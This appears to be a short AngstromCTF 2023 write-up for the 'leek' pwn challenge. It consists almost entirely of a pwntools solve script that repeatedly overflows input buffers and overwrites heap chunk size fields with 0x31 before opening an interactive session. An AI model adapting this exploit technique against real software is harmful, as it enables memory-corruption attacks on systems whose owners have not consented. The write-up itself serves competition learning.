leek

05/04/2023

By: unvariant

Tags: pwn AngstromCTF-2023

Problem Description:

None

Hints:

Reveal Hints

None

Solve script

from pwn import *

if args.REMOTE:
    io = remote("challs.actf.co", 31310)
else:
    io = process("./leek")

io.recvuntil(b"secret.\n")

for i in range(100):
    io.recvuntil(b"!!): ")
    attack =  b""
    attack += b"A" * 0x40
    io.sendline(attack)
    io.recvuntil(b"? ")
    io.send(b"A" * 0x20)
    io.sendline(p64(0x31) * 4)

io.interactive()